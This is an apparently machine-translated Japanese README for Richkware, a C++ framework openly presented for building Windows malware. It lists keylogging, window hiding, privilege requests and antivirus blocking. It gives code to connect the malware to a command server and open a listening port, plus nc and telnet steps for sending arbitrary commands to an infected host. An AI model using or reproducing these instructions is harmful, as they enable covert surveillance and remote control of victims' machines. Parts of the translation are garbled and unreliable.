C ++で記述されたWindowsマルウェアを構築するためのフレームワーク。
Richkwareは、ネットワークおよびOS機能のライブラリであり、マルウェアの作成に使用できます。これらの関数の構成により、アプリケーションは次のタイプのマルウェアを参照できる動作を引き受けることができます。
richkware-manager-server: richkwareフレームワークを使用して開発されたマルウェアのインスタンスが存在するホストの管理のためのサービス。
richkware-manager-client: richkware-manager-serverのクライアントは、サーバーからすべてのホストのリストを取得し、あらゆる種類のコマンドをそれらに送信できることです。
| en | それ | |
|---|---|---|
| プレゼンテーション | ||
| 報告 |
ストレージ( Storage.H ):
ISADMINおよびRequestAdminPrivileges ( richkware.h ):管理者の特権を確認して要求します。
StealthWindow ( richkware.h ):アプリケーションを非表示。
OpenApp ( richkware.h ):任意のアプリケーションを開きます。
keylogger ( richkware.h ):ファイルにすべてが押されたキーをすべて保存します。
BlockApps e Unblockapps ( blockapps.h ):ブロックおよびアンブロックアプリケーション(Antivirus、...)。
これらは、richkwareを構築および使用するための基本要件です。
main.cppを開き、richkwareのインスタンスを作成します。
RMSを展開している場合は、次のようにマルウェアを初期化できます。
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
Richkware-Manager-Serverから安全なキーを取得し、暗号化キーとしてキーを設定します。 DefaultPassは、RMSとの安全な通信を確保するために一時的な暗号化キーとして使用され、マルウェアが暗号化KETを取得するためにRMSに到達できない場合、DefaultPassを暗号化キーとして使用します。
それ以外の場合、RMSを展開していない場合は、以下を使用できます。
Richkware richkware("Richk","richktest");
このようにして、暗号化キーとして「richktest」を使用します。
main.cppの実装の後、次のようにコンパイルできます。
make
次の例では、richkwareフレームワークを使用して開発されたマルウェアである「サーバー」と呼び、そこではサーバーを作成するための関数と、感染したPCとの接続を確立しようとしているマルウェアの作成者(ハッカー)である「クライアント」を「クライアント」と呼びます。
メインのCall Framework関数StartServerは、ポートでサーバーを起動します。次の例では、TCPポート8000です。ポートが既に別のプログラムで使用されている場合、プログラムが停止するまでそのポートを使用できないことを忘れないでください。
int main () {
...
richkware.network.server.Start("8000");
...
}
Java Virtual Machineがインストールされているすべてのシステムで、Richkware-Manager-Clientを使用できます。そうしないと、存在しない場合は端末を簡単に使用できます。
UNIX Systemsでは、 NetCatを使用して、次のコマンドを実行できます。
nc <serverName> 8000
サーバーがオープンポートでリクエストを受信し、接続を作成することに成功した場合、接続の確立を確認するクライアントに応答します。その後、次を記述できます。
[[1]]COMMAND
コマンドは、サーバーが実行されている感染したホストで実行する必要があるコマンドです。
Windowsでは、 Telnetを同じように使用できます。
telnet <serverName> 8000
...
[[1]]COMMAND